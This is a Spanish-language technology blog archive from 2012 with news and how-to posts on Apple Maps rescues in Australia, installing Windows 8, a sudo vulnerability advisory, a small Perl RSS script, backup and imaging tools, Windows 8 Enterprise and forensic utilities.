lunes, 10 de diciembre de 2012

Los mapas de Apple amenazan la vida, dice la policia australiana

Mucho habíamos oído acerca de los mapas de Apple desde que la compañía los anunciara hace ya un cierto tiempo y la posterior decepción por parte de los usuarios al comprobar los numerosos fallos de la aplicación, pero atónitos nos hemos quedado al contemplar que la policía australiana desaconseja su uso a los ciudadanos de ese país porque, atención, pueden causar peligro de muerte. Vale, quizás nos tachéis de sensacionalistas al utilizar tamaña expresión, pero es la propia policía australiana la que, tras llevar a cabo varios rescates propiciados por las indicaciones fallidas de Apple Maps, ha lanzado un comunicado alentando a que no se utilice esta aplicación para orientarse por el país ya que , según han indicado, “suponen un problema que amenaza potencialmente la vida”. En dicho comunicado las autoridades australianas explican que en seis ocasiones han tenido que rescatar a varias personas que se habían perdido en el Parque Natural de Murray Sunset al tratar de llegar siguiendo las indicaciones de los mapas de Apple.
Pensaréis que es un tanto exagerado tildar de “peligro de muerte” a perderse en un Parque Natural, pero da la casualidad de que en dicho lugar se alcanzan a diario temperaturas de hasta 46 grados centígrados y, por si eso fuera poco, las reservas de agua en su entorno son prácticamente nulas. Como podréis imaginar, los rescatados se llevaron un buen susto al pasar 24 horas perdidos en un recóndito lugar sin comida ni bebida y ningún atisbo de civilización a la vista.
Los rescates tuvieron lugar en un corto periodo de tiempo en una zona a unos 70 kilómetros al sur de la ciudad australiana de Mildura, lugar al que los visitantes habían llegado siguiendo las indicaciones de navegación de los mapas de Apple cuando pretendían alcanzar la propia ciudad. Por ello, en el comunicado la policía remarca:
Es una situación de sumo peligro, pedimos a la gente que no use el nuevo sistema de mapas de Apple si viaja desde el sur de Australia a la ciudad de Mildura.
Para evitar este problema las autoridades han recomendado a los que quieran desplazarse por el país que sigan las indicaciones de otros servicios de geolocalización más experimentados como Google Maps o un dispositivo GPS al uso.
Hay que destacar que Australia es un continente en sí mismo, y es que en las zonas más áridas del país además de las temperaturas extremas y la falta de precipitaciones (y reservas de agua) habitan varias de las criaturas más peligrosas y venenosas del planeta. Sin duda esta no es una de las mejores formas de hacer publicidad a la compañía de Cupertino, pero lo cierto es que viendo los errores garrafales previos no es de extrañar que se den estos casos y en juego no solo está la demora en llegar al destino, esto es algo mucho más importante.

Guido van apuesta por dropbox

El creador de Python, Guido Van Rossum, deja Google y ficha por Dropbox

Probando SAMSUNG GALAXY NOTE 2

Recien desembalado el nuevo note 2, lo probamos y os remitiremos la experiencia de uso

Saludos

sábado, 16 de junio de 2012

¿Podría ser el cloud computing la salvación al paro en España?

¿Tiene el cloud computing más recorrido que el que ya conocemos? ¿Ha llegado a un límite o puede todavía ir más allá y cambiar nuestra economía? Según las conclusiones del estudio Spain 20.20: TIC y Sostenibilidad, que hoy ha presentado el Club de Excelencia en Sostenibilidad, de la nube se puede esperar todavía mucho y su potencial recorrido en la economía española es todavía un diamante por descubrir.
El Club de Sostenibilidad, que conforman diez empresas de primer nivel de la industria española, ha alcanzado una serie de conclusiones sobre cómo la tecnología puede mejorar la competitividad de España y ahorrar más de 600.000 millones al país hasta 2020. La nube es una de las patas tech que analiza el informe.

Según sus concluisones, la nube no es sólo una mejora empresarial que no implica mucho coste sino que además tiene un retorno en términos de ahorro bastante importante.Implantar el cloud computing en el tejido empresarial español permitiría ahorrar en 2020 en emisiones al exterior 2,52 MtCO2 frente a lo que se esperaría si se sigue la tendencia actual. En términos económicos, el ahorro sería de 211 millones de euros, de los que un 3,3% vendrían del ahorro energético que supone apuntarse a la nube.

Dar el salto al cloud supondría también crear mercado laboral. Las conclusiones del informe demuestran que la nube podría generar unos 62.300 puestos de trabajo, gracias sobre todo a los nuevos negocios que se crearían gracias a la nube. A ellos se sumarían los proveedores de servicios cloud, que crearían puestos de trabajo directos asociados a la nube.

Fuente: http://www.laflecha.net/canales/empresas/noticias/el-cloud-computing-podria-ser-la-salvacion-al-paro-de-espana

domingo, 3 de junio de 2012

Instalación Windows 8 - Release Preview

Ayer al final de la tarde fue publicada la Release Preview de Windows 8, el último lanzamiento previo al de la versión final de la próxima versión de Windows.

El interés por probarla es generalizado; muchos de vosotros habéis manifestado vuestra intención de, al menos, usar una máquina virtual. Muchos nos habéis planteado dudas acerca de la instalación y de algunos detalles sobre la actualización actualización. Vamos a intentar despejar nuestras dudas acerca de la instalación de Windows 8.

Requisitos mínimos de Windows 8
Cabe resaltar que estos requisitos que os voy a mencionar ahora se aplican únicamente a las versiones para 32 y 64 bits sobre plataformas Intel y AMD; no podemos instalar la versión ARM por nuestra cuenta. Puede que los requisitos minimos para esa versión sean distintos.

Procesador Intel o AMD de 1Ghz
1GB de RAM
16GB de espacio en disco duro para la versión de 32 bits, 20GB para la versión de 64 bits
Tarjeta gráfica compatible con WDDM y DirectX 9
Resolución de pantalla de 1024×768 para acceder a la Windows Store
Resolución de pantalla de 1366×768 para acoplar aplicaciones Metro
Pantalla o trackpad multitouch (para usar los gestos)
A grandes rasgos vemos que los requisitos mínimos, salvo los relativos a la pantalla, son los mismos que los de Windows 7, y teóricamete Windows 8 debería funcionar más fluido que su predecesor en el mismo hardware.

¿Cómo instalar Windows 8?
Hay dos opciones. La primera y más fácil es descargar el programa de instalación de Windows 8 desde la Web que Microsoft ha habilitado para ello, un ejecutable de pocos megas que probará vuestro ordenador y generará un informe de compatibilidad para vuestro hardware y software. El PC deberá tener todos los dispositivos que vamos a usar conectados y encendidos. Nuestro ordenador también deberá estar conectado a Internet. Este programa requiere Windows Vista o Windows 7.

Este programa de instalación descargará automáticamente la versión correcta de Windows 8 Release Preview (prometiendo ahorrar algo de ancho de banda) y permitirá actualizar nuestro sistema a Windows 8, pero dependiendo del sistema operativo que estemos ejecutando podremos conservar unos datos u otros.

Con este programa de instalación podremos, más adelante, elegir cómo queremos instalar Windows 8. Podemos elegir actualizar nuestro sistema directamente desde el programa de instalación o crear un disco extraíble desde el que instalar desde cero o actualizar. Podemos hacerlo todo utilizando ese programa. Aun con todo, también disponemos de una imagen ISO que podemos descargar, grabar en un DVD o un disco USB e instalar. No hace falta que introduzcamos correo electrónico alguno para ello.

Necesitaremos una clave, por cierto, para instalar Windows 8 si elegimos hacer una instalación desde cero. Deberemos usar la siguiente:

Citar
TK8TP-9JN6P-7X7WW-RFFTV-B7QPF
Actualizar a Windows 8
Vamos a ver cómo podemos actualizar a Windows 8 y qué datos conservaremos si lo hacemos. Obviaré el método de instalación limpia por ser el que todos dominamos a fuerza de formateos; aun con todo el método de instalación es extremadamente parecido al de la Consumer Preview, que ya revisamos. Cambian algunos detalles, como que ahora tenemos más combinaciones de colores disponibles.

Como dijimos ayer, es posible actualizar a Windows 8 desde alguna versión previa de ese sistema operativo (ya sea la Consumer Preview o la Developer Preview), desde Windows 7, Vista o incluso desde Windows XP. La gama de configuraciones que conservaremos varía según lo que ejecutemos antes de actualizar:

Windows 8 Consumer Preview o Developer Preview: no se conservan configuraciones ni programas, los archivos se mueven a Windows.old. ¡Las aplicaciones adquiridas vía Windows Store podemos reinstalarlas desde ahí!
Windows 7: conservaremos programas, cuentas de usuario (con sus archivos) y configuraciones de usuario y del sistema.
Windows Vista: podremos conservar las cuentas de usuario, sus archivos y sus configuraciones. Las aplicaciones deberemos reinstalarlas.
Windows XP: conservaremos, únicamente, las cuentas de usuario y los archivos.
Para actualizar nuestro sistema deberemos iniciar el programa de instalación desde Windows y no bootear nuestro PC desde un disco que podamos haber creado.

Arranque dual de Windows 7 y Windows 8
Es posible también configurar un arranque dual de Windows 7 y Windows 8. El método es relativamente simple:

Reducimos nuestra partición actual de Windows 7 desde el administrador de discos del sistema. Podemos poner en el buscador del menú de Inicio “Crear y administrar particiones”, aparecerá la aplicación para hacerlo. Deberemos hacer hueco para unos 25GB. Si tenemos un segundo disco duro para instalar Windows 8 obviamente este paso y el siguiente no son necesarios.
Una vez lo hagamos (no necesitamos reiniciar el sistema ni nada parecido, si bien en función del grado de fragmentación del disco puede ser un proceso largo y que jamás debe ser interrumpido, crearemos una nueva partición NTFS ocupando todo el espacio.
Creamos un disco de Windows 8 e iniciamos el sistema desde él.
A la hora de seleccionar la partición, seleccionamos la que hemos creado de unos cuantos GB. El instalador se encargará del resto.
Como recomendación personal: evitad las máquinas virtuales
La instalación de Windows 8 en una máquina virtual es análoga a la de una máquina física, y puede ser tentador probarlo en un entorno así antes de lanzarnos a la aventura. De hecho lo lógico es probar este sistema operativo primero en un entorno donde no sea grave que se rompa algo.

No obstante debo avisaros de que la experiencia de usuario de Windows 8 en una máquina virtual es de todo menos satisfactoria. Creedme que lo he intentado en mi ultrabook (Intel Core i5, 4GB de RAM) y hasta costaba mover el puntero del ratón para apagar la máquina virtual.

Si no hay otro remedio probadlo en un entorno así, pero mi recomendación es que probéis Windows 8 siempre que podáis en un ordenador físico que no necesitéis o configurando un arranque dual. Probablemente tengamos por casa alguna máquina de hace cuatro o cinco años que no utilicemos y que podrá ejecutar bastante bien el nuevo sistema operativo de Microsoft.

Espero haber sido capaz de arrojar algo de luz sobre la instalación de Windows 8 Release Preview. Permaneced sintonizados a Genbeta: muy pronto revisaremos a fondo Windows 8 Release Preview para que estéis al tanto de todas las novedades relativas a este sistema operativo.

FUENTE :http://www.genbeta.com/windows/todo-lo-que-necesitas-saber-para-instalar-la-release-preview-de-windows-8

sábado, 19 de mayo de 2012

Salto de restricciones en SUDO

Se ha descubierto una vulnerabilidad en sudo que podría permitir a un atacante local eludir determinadas restricciones de seguridad. El fallo afecta a casi todas las distribuciones basadas en el kernel Linux.
Sudo es una herramienta de administración utilizada en muchas de las distribuciones basadas en el kernel Linux. Permite a los usuarios ejecutar comandos con los privilegios de otro, comúnmente de root, de forma controlada y segura. Sudo permite además ejecutar comandos en hosts remotos especificados en el fichero 'sudoers' mediante su nombre de máquina, IP, grupo de red, o dirección de red (IP y máscara de red).
Jan Lieskovsky ha descubierto esta vulnerabilidad identificada como CVE-2012-2337. Se debe a un error en la manera en que se concede el acceso a un determinado host, cuando existen múltiples máscaras de red en la parte de configuración de 'host' y 'host_list' del archivo 'sudoers'.
El fallo se introdujo cuando se agregó el soporte para IPv6 a sudo (hace aproximadamente 5 años), y podría producir una coincidencia en direcciones de red IPv4 cuando no debe. Esto podía permitir a usuarios autorizados en el archivo 'sudoers' realizar un salto de restricciones. De esta forma podrían ejecutar comandos sudo en cualquier host, independientemente de la configuración 'host_list', e incluso si la configuración para esa máscara de red impide la ejecución de dichos comandos.
Si en el archivo 'sudoers' no se incluyen redes IP para especificar el host, la vulnerabilidad no tiene ningún efecto. Por tanto este problema, aunque importante, no alcanza la gravedad del reciente fallo descubierto a finales de enero que permitía a cualquier atacante local convertirse en root.
Se encuentran afectadas por esta vulnerabilidad las versiones de sudo de la 1.6.9p3 hasta la 1.8.4p4. Desde la página oficial se pueden descargar las versiones de sudo 1.8.4p5 y 1.7.9p1 que corrigen este fallo. Muchas distribuciones han comenzado a distribuir paquetes propios que la solucionan.

Una al dia - Hispasec

martes, 15 de mayo de 2012

Simple Script cgi-perl ENTRADAS BLOGS

Simple Script en perl para mostrar una tabla con 3 entradas de blog en una pagina SHTML


#!/usr/bin/perl
    use XML::RSS::Feed;
    use LWP::Simple qw(get);
    use CGI qw(:standard);
    use CGI::Carp qw(fatalsToBrowser);
    
    print "Content-type: text/plain\n\n"; #Devolvemos a la llamada CGI el retorno de texto plano
        my $feed = XML::RSS::Feed->new(
        url    => "http://feeds.feedburner.com/AdictosDeLaInformacin",
        name   => "AdictosDeLaInformacin",
max_headlines => 3,#Limite d entradas a mostrar en el blog
    );
#preparamos la tabla que vamos a insertar en la pagina shtml desde la llamada al CGI
print "<table width=150 border=0 cellspacing=10 cellpadding=4>\n";
        print "<caption align=top>\n";
        print "$name\n";
        print "</caption>\n";
    while (1) {
        $feed->parse(get($feed->url));
        print "<tr><td><a href=". $_->url => $url . " target=_blank>" . $_->headline . "</a></td></tr>\n\n\n" for

$feed->late_breaking_news;#Imprime en un Hipervinculo el titulo y su link cada uno en una celda distinta
        
print "</table>\n";
exit();
    }

domingo, 29 de abril de 2012

Libro fundamentos de la WEB

necesito_conocer
Este es un libro que he maquetado para adquirir una base para el desarrollo de WEB sites


Descarga de libro: http://es.scribd.com/doc/91712482/necesito-conocer

sábado, 21 de abril de 2012

Exiland Backup: utilidad para realizar backups de todo nuestro sistema


La copia de seguridad es uno de los grandes olvidados en el entorno de hogar. Se nos pasa, no realizamos copia, lo fiamos todo a la nube o simplemente muchos ni siquiera se lo plantean. Hasta que surge un problema y pierden datos la primera vez. A partir de aquí se suele aprender la lección. Hoy vamos a ver la solución que nos ofrece Exiland Backup, un completo sistema para realizar tus copias de seguridad y evitar estos sustos.
Exiland Backup esta disponible en dos versiones, una gratuita y otra de pago. La principal diferencia es que la versión de pago podemos programarla de forma automática para que se ejecute, al apagar el ordenador, o al conectar una unidad USB, o un día concreto a una hora determinada, por ejemplo. En la versión gratuita perdemos esta capacidad, por lo que hay que lanzar la copia de forma manual. Nada que no se pueda solucionar con unos avisos programados en el calendario.

Por lo que respecta al software está disponible para sistemas Windows XP, Vista y 7. Es bastante ligero y se instala muy rápido. Una vez instalado nuestra primera misión será crear las tareas de copia de seguridad. Para ello tenemos que seleccionar los archivos que queremos copiar. Podemos excluir archivos de los directorios seleccionados, decidir si copiamos también los subdirectorios o no, o copiar sólo determinados archivos con una extensión concreta.

Podemos elegir entre una copia completa, diferencial, incremental o de sincronización. Este último caso se utiliza cuando se quieren mantener dos copias en espejo, por ejemplo en un disco duro externo de toda vuestra música. A la vez podemos decir que número de copias queremos que nos guarde el sistema. Las copias de seguridad se pueden guardar comprimidas para que ocupen menos tamaño y si lo deseamos protegerlas con una contraseña.



Nos permite definir la ejecución de copias de seguridad con determinadas condiciones, por ejemplo si existe o no determinado archivo, si un equipo en la red responde a ping o si una aplicación está en marcha o parada. También se puede lanzar la copia, por ejemplo después de ejecutar una aplicación concreta. Por último una opción muy útil son las notificaciones si ha habido algún problema, ya sea por correo electrónico, con un mensaje a nuestro equipo o una notificación de escritorio.

Las copias las podemos guardar en una unidad externa ya sea con una conexión USB o de red o en un servidor FTP. Como siempre no es recomendable guardar la copia de seguridad en el mismo disco del cual estamos haciendo copia de los datos. Se trata de una solución muy completa, que si de algo peca para su uso en el hogar es de tener quizás demasiadas opciones, que pueden confundir al usuario menos habituado a trabajar con las copias de seguridad. Lo cierto es que es una herramienta profesional limitada únicamente en la posibilidad de programar las tareas.

FUENTE :http://www.genbeta.com/windows/exiland-backup-un-completo-sistema-para-realizar-tus-copias-de-seguridad

http://www.exiland-backup.com/

jueves, 19 de abril de 2012

Microsoft Presenta la cuarta alternativa de Windows 8, ahora la Enterprise


Windows 8 Enterprise features include all the capabilities that customers get with Windows 8 Pro (as outlined in Monday’s blog), plus premium features designed to provide the mobile productivity, security, manageability and virtualization needs of today’s businesses. Here’s an overview of some of the key features that will be available exclusively to Windows 8 Enterprise customers (and note this is not an exhaustive list):
  • Windows To Go is a fully manageable corporate Windows 8 desktop on a bootable external USB stick. This will allow IT organizations to support the “Bring Your Own PC” trend and businesses can give contingent staff access to the corporate environment without compromising security.
  • DirectAccess allows remote users to seamlessly access resources inside a corporate network without having to launch a separate VPN and helps IT administrators keep remote users’ PCs in compliance by applying the latest policies, software updates, is easier to deploy, and it can be implemented with the existing IPv4 infrastructure.
  • BranchCache allows users’ PCs to cache files, websites, and other content from central servers, so content is not repeatedly downloaded across the wide area network (WAN). When used with Windows Server 2012, Windows 8 brings several improvements to BranchCache to streamline the deployment process, optimize bandwidth over WAN connections and ensure better security and scalabilty.
  • AppLocker can help mitigate issues by restricting the files and apps that users or groups are allowed to run.
  • VDI enhancements: Enhancements in Microsoft RemoteFX and Windows Server 2012, provide users with a rich desktop experience with the ability to play 3D graphics, use USB peripherals and use touch-enabled devices across any type of network (LAN or WAN) for VDI scenarios.
  • New Windows 8 App Deployment: Domain joined PCs and tablets running Windows 8 Enterprise will automatically be enabled to side-load internal, Windows 8 Metro style apps.

In addition to these features, customers will get improvements to the fundamentals, including end-to-end security and better manageability. Businesses will also benefit from the immersive, personalized experience Windows 8 has to offer and the no-compromise business tablet that will mean businesses no longer have to choose between the functionality of a tablet or the productivity of a PC. There’s a good summary of these features in a press release we issued last month.
Enhancing the Windows Benefits in Software Assurance
As we reimagine Windows 8, we’re also enhancing our Software Assurance (SA) benefits to meet the needs of today’s workforce. I know you all see firsthand how technology has influenced the way people work and how employees need to stay connected to their data, apps and other people from anywhere, at any time, from a range of devices. We will be making improvements to Windows Software Assurance that provides business customers with better ways to enable these flexible work styles.
So let’s take a look at some of the details of the new licensing benefits. After Windows 8 Enterprise becomes available, Software Assurance customers will have the following new use rights:
  • Windows To Go Use Rights: Windows To Go will allow companies to support Bring Your Own PC scenarios and will give employees who need to work from home more secure access to their full corporate environment. With Windows To Go use rights under Software Assurance, an employee will be able to use Windows To Go on any company PC licensed with Windows SA as well as from their home PC. Additionally, through a new companion device license for SA, employees will be able to use WTG on their personal devices at work.
  • Windows RT Virtual Desktop Access (VDA) Rights: When used as a companion of a Windows Software Assurance licensed PC, Windows RT will automatically receive extended VDA rights. These rights will provide access to a full VDI image running in the datacenter which will make Windows RT a great complementary tablet option for business customers.
  • Companion Device License: For customers who want to provide full flexibility for how employees access their corporate desktop across devices, we are introducing a new Companion Device License for Windows SA customers. For users of Windows Software Assurance licensed PCs this optional add-on will provide rights to access a corporate desktop either through VDI or Windows To Go on up to four personally owned devices.
Microsoft Desktop Optimization Pack
In addition to Windows 8 Enterprise, Software Assurance customers also have the ability to subscribe toMDOP. MDOP helps enterprise customers take advantage of desktop virtualization, manage Windows features, and restore user productivity after a system issue. We have recently also added User Experience Virtualization (UE-V), which allows individuals to change their device without reconfiguring applications or settings in Windows 7 or Windows 8.
Windows Intune
Windows Intune offers PC management and security from virtually anywhere via the cloud. In addition, wejust announced that the next release of Windows Intune will support mobile device management, a self-service Company Portal and the ability to leverage user accounts, in addition to several other enhancements. Windows Intune is available as an add-on for Windows customers with Enterprise Agreements and gives you a way to manage multiple devices for each employee under a single license.
Enhancing Enterprise Value
Windows 8 Enterprise, MDOP, Windows Intune and our new Software Assurance benefits will help you deliver the experiences people love while maintaining the security and manageability you require.
If you haven’t already, I encourage you to download the Windows 8 Consumer Preview to experience first-hand the beautiful, fast and fluid experience that includes the mobility, performance and security features your business needs. I also encourage you to stay tuned here to the Windows for your Business blog for more information on the enterprise value we’ll be delivering.

lunes, 16 de abril de 2012

Active Directory en Microsoft Windows 8 Server

Si estáis probando Microsoft
Windows 8 Server puede que hayáis encontrado algún problema a la
hora de instalar AD (Active Directory).
Como
venía siendo habitual, se abría una Shell (por ejemplo PowerShell)
y se lanzaba el comando dcpromo
Se abre por lo tanto el ‘Server Manager’. Se puede hacer desde el
icono en la barra de tareas.
Una vez se accede, se pulsa sobre ‘File and Storage Services’ y se
hace clic secundario en el servidor donde se desee instalar el AD.
Acto seguido hay que seleccionar el componente ‘Active Directory Domain
Services’. Se avisará que existen dependencias que deben
instalarse. Se pulsa ‘Install’ y se espera a que finalice.
Se inicia la configuración del AD pulsando en ‘Promote this server to
a domain controller’. Se configura de forma habitual y antes de
instalar aparecerá una pantalla con el resumen de la configuración.
Una vez finalizada la instalación se podrá administrar el AD desde el
‘Active Directory Administrative Center’. Se accede desde el
‘Server Manager’, en la sección ‘AD DS’ y clic secundario en
el servidor deseado.

Fuente: Windows tecnico
http://feedproxy.google.com/~r/WindowsTecnico/~3/1rbu7y7H21E/active-directory-en-microsoft-windows-8-server.aspx

Proyecto xtractor

Desde hace un tiempo estoy desarrollando una herramienta de analisis forense que en corcondancia con la recien salida herramienta "RadioGraPhy 1.0" realiza una recopilación sobre todo el sistema corrompiendo lo menos posible la integridad del sistema.
Iré subiendo el codigo poco a poco para que le echeis un vistazo y corrijan errores así como aportar ideas, el proyecto será totalmente libre y portable en cualquier USB.

Como la herramienta anteriormente mencionada calcula los HASH de todos los archivos de sistema comparandolo con los legitimos, monitoriza los drivers y sus carpetas en el sistema,registros de sistema,de red, hace un estudio de los procesos activos, vuelca la RAM asi como diferentes funcionalidades que se iran incorporando poco a poco.

Espero que os guste a titulo didactico,

Un saludo.

www.adictosdelainformacion.com.es

RadioGraPhy 1.0

Una de las cosas más importantes cuando se procede a realizar una investigación forense en un ordenador, es obtener la mayor cantidad posible de información.
Es básico el poder contar con una 'radiografía' del equipo, que muestre la mayor cantidad de pistas para poder deducir si ese equipo está comprometido y como.
En el caso de Windows, hay herramientas bastante buenas como 'MIR-ROR' o 'HijackThis', y hoy voy a añadir una más a la lista: RadioGraPhy.
RadioGraphy, como su nombre indica, intenta 'radiografiar' el sistema y obtener datos relevantes:

Las claves del registro asociadas al auto-arranque de procesos

Las claves del registro asociadas a la configuración de IE

Las cuentas de usuario del sistema

Los ficheros en directorios 'startup'

Los servicios del sistema

El contenido del fichero 'hosts'

Los 'task' del scheduler de windows

Los drivers o módulos cargados en el Kernel de Windows

Carpetas compartidas por NetBios

Ventanas ocultas (cmd y IE)

La lista de procesos activos en el sistema y el path del ejecutable

Información relacionada con la red (puertos abiertos, conexiones, etc)

Adicionalmente, tiene soporte para el Team Cymru's MALWARE HASH REGISTRY (del que hablamos aquí) lo que permite que, cuando encuentra un binario, ya sea un proceso en ejecución o un binario asociado a una clave de registro / task, comprueba si su hash ha sido identificado como sospechoso.
También he integrado 'WinUnhide' para que realice un test de integridad de procesos en búsqueda de procesos ocultos.
La herramienta cuenta con una versión por línea de comandos y otra en formato GUI

Pagina del proyecto:
http://www.security-projects.com/?RadioGraPhy

Fuente: www.securitybydefault.com

domingo, 15 de abril de 2012

Macrium Reflect 5.0.4432: Crea imágenes del sistema con este programa gratuito

Macrium Reflect Free Edition es un programa gratuito alternativo a Norton Ghost y Acronis True Image, que permite como estos últimos crear imágenes de nuestro sistema operativo, incluyendo todos los programas instalados y los controladores, para que en caso de algún tipo de desastre o inestabilidad del sistema (virus, pantallazos azules, degradación del sistema, etc) poder restaurar las imágenes creadas y dejar el sistema otra vez a punto. Ahora en la página oficial de Macrium, se anuncia la disponibilidad para descargar de una nueva versión del programa: Macrium Reflect 5.0.4432, en la que se ha solucionado un problema con la creación de imágenes a DVD, un problema con la restauración desatendida y se ha corregido un error en la creación de intantáneas VSS entre otras novedades y correcciones de errores. Macrium Reflect es compatible con los sistemas operativos Windows XP, Vista y Windows 7 contando con una versión nativa tanto para sistemas 32 bits como para sistemas 64 bits, incluidas en el mismo instalador . Además de la versión gratis (Free Edition) que nos ocupa, el programa cuenta con otra versión de pago con funciones avanzadas, cuyas diferencias con la anterior podéis consultar en esta tabla comparativa.
Macrium Reflect permite crear imágenes del sistema (sistema operativo, programas, datos, drivers) aún cuando el sistema esté en uso, utilizando Microsoft Volume Shadow copy Service (VSS), permite guardar las imágenes del sistema en otro disco duro, en red, USB, discos Firewire y DVD e incluye un CD de rescate con acceso a red e GUI (listado completo de funciones)(http://www.macrium.com/pages/features.aspx).

Se puede descargar Macrium Reflect Free Edition 5.0.4432 desde el siguiente enlace:
http://www.macrium.com/reflectfree.aspx

FUENTE :http://www.softzone.es/2012/04/15/macrium-reflect-5-0-4432-crea-imagenes-del-sistema-con-este-programa-gratuito/

jueves, 5 de abril de 2012

unaaldia: Nuevos contenidos en la Red Temática CriptoRed (marzo de 2012)

OServicio oficial de una-al-día ofrecido por Hispasec Sistemas.

miércoles 4 de abril de 2012

Nuevos contenidos en la Red Temática CriptoRed (marzo de 2012)

Breve resumen de las novedades producidas durante el mes de marzo de 2012 en CriptoRed, la Red Temática Iberoamericana de Criptografía y Seguridad de la Información.

1. NUEVOS DOCUMENTOS EN LA RED TEMÁTICA EN EL MES DE MARZO DE 2012
Actualización del documento Normas ISO de Seguridad de la Información (Carlos Ormella Meyer, Universidad del Museo Social Argentino, Argentina)
http://www.criptored.upm.es/guiateoria/gt_m327a.htm
MOOC Crypt4you Aula Virtual. Curso El algoritmo RSA
Lección 1. Los principios del algoritmo RSA, 15 de marzo de 2012. (Jorge Ramió, Universidad Politécnica de Madrid, España)
Lección 2. Valores de diseño de las claves, 30 de marzo de 2012. Lección en portada (Jorge Ramió, Universidad Politécnica de Madrid, España)
http://www.crypt4you.com

2. NUEVOS VÍDEOS EN INTYPEDIA EN EL MES DE MARZO DE 2012
Lesson 13: Security in DNS (Javier Osuna García-Malo de Molina, GMV, España)
http://www.intypedia.com/?lang=en (Last video)
3. DOCUMENTOS RECOMENDADOS DE OTROS SERVIDORES EN EL MES DE MARZO DE 2012
Inseguridad de la información: Retos de espacios en blanco y lecciones de cisnes negros (Jeimy Cano, Blog IT-Insecurity, Colombia)
http://insecurityit.blogspot.com/2012/02/inseguridad-de-la-informacion-retos-de.html

Inseguridad en redes sociales. La inevitabilidad de la falla en nuestros comportamientos y valores (Jeimy Cano, Blog IT-Insecurity, Colombia)
http://insecurityit.blogspot.com/2012/02/inseguridad-en-redes-sociales-la.html

Privacidad de los datos. Más que un aspecto de cumplimiento (Jeimy Cano, Blog IT-Insecurity, Colombia)
http://insecurityit.blogspot.com.es/2012/03/privacidad-de-los-datos-mas-que-un.html

Educación en la Web: Cómo hacer un buscador como Google sin saber de programación (Gaspar Modelo Howard, blog Seguridad + Investigación, Panamá)
http://iobses.blogspot.com/2012/03/educacion-en-la-web-como-hacer-un.html

Informe de la Red de Sensores del mes de febrero de 2012 sobre virus y malware (INTECO, España)
https://ersi.inteco.es/informes/informe_mensual_201202.pdf

Guía sobre contratación pública electrónica (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/guias/guia_e_contratacion

Guía sobre las tecnologías biométricas aplicadas a la seguridad (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/guias/guia_biometria

Estudio sobre las tecnologías biométricas aplicadas a la seguridad (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/Estudios/estudio_biometria

Estudio sobre la seguridad de la información y la e-confianza de los hogares españoles, 2º cuatrimestre de 2011 - 16ª oleada (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/Estudios/Estudio_hogares_2C2011

Cuaderno de notas del Observatorio: Medidas de seguridad para transacciones online (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/Articulos/CN_Transacciones_Online

Cuaderno de notas del Observatorio: Malware y dispositivos móviles (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/Articulos/malwer_moviles

Estudio sobre el fraude a través de Internet, 2º cuatrimestre de 2011 (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/Estudios/Estudio_fraude_2C2011

Estudio sobre la seguridad de las redes inalámbricas (wifi) en los hogares españoles, 2º cuatrimestre de 2011 (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/Estudios/estudio_inalambricas_2C2011

Estudio sobre seguridad en dispositivos móviles y smartphones, 2º cuatrimestre de 2011 (20/03/2012) (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/Estudios/estudio_moviles_2C2011

Estudio sobre la seguridad de los sistemas de monitorización y control de procesos e infraestructuras (SCADA) (Observatorio de la Seguridad de la Información de INTECO, España)
http://www.inteco.es/Seguridad/Observatorio/Estudios/Estudio_SCADA
4. RELACIÓN DE CONGRESOS, SEMINARIOS Y CONFERENCIAS POR ORDEN CRONOLÓGICO DE CELEBRACIÓN
Abril 24 al 26 de 2012: XXIII Congreso Español de Seguridad de la Información Securmática (Madrid - España)

Mayo 16 al 18 de 2012: Second International Conference on Digital Information and Comm. Tech. and its Applications DICTAP2012 (Bangkok - Thailandia)

Junio 20 al 23 de 2012: Séptima Conferencia Ibérica de Sistemas y Tecnologías de Información CISTI 2012 (Madrid - España)

Junio 25 de 2012: The Second International Workshop on Information Systems Security Engineering WISSE '12 (Gdansk - Polonia)

Junio 28 a Julio al 1 de 2012: Ninth International Workshop on Security In Information Systems WOSIS 2012 (Wroclaw - Polonia)

Julio 16 al 18 de 2012: 10th Annual Conference on Privacy, Security and Trust PST 2012 (París - Francia)

Julio 11 al 13 de 2012: Data and Applications Security and Privacy DBSEC 2012 (París - Francia)

Julio 24 al 27 de 2012: International Conference on Security and Cryptography SECRYPT 2012 Roma - Italia)

Julio 25 al 27 de 2012: International Conference on Data Technologies and Applications DATA (Roma - Italia)

Septiembre 4 al 7 de 2012: XII Reunión Española sobre Criptología y Seguridad de la Información RECSI 2012 (San Sebastián - España)

Septiembre 5 al 8 de 2012: 5th International Conference on Computational Intelligence in Security CISIS 12 (Ostrava - República Checa)

Septiembre 17 al 18 de 2012: 7th International Workshop on Critical Information Infrastructures Security CRITIS 2012 (Lillehammer - Noruega)

Septiembre 26 al 28 de 2012: Congreso Privacy in Statistical Databases PSD 2012 (Palermo - Italia)
Más información en:
http://www.criptored.upm.es/paginas/eventos.htm#Congresos
5. FUE TAMBIÉN NOTICIA EN LA RED TEMÁTICA EN EL MES DE MARZO DE 2012
CFP para 7th International Workshop on Critical Information Infrastructures Security CRITIS 2012 (Noruega)

CFP para Privacy in Statistical Databases PSD 2012 (Italia)

Proyecto para la securización de aplicaciones que hacen uso del DNIe de OWASP España (España)

Próximos eventos de seguridad a celebrarse en La Paz, Cochabamba y Santa Cruz organizados por Yanapti (Bolivia)

Siete informes y guías del Observatorio de la Seguridad de la Información de INTECO (España)

Curso de Derecho Penal de las Nuevas Tecnologías de IAITG en Madrid (España)

Crypt4you un nuevo formato de cursos gratuitos online de criptografía y seguridad de la información (España)

Programa de la XXIII edición del Congreso Español de Seguridad de la Información Securmática (España)

Segunda Llamada al Envío de Trabajos para la XII RECSI 2012 (España)
Acceso al contenido de estas noticias:
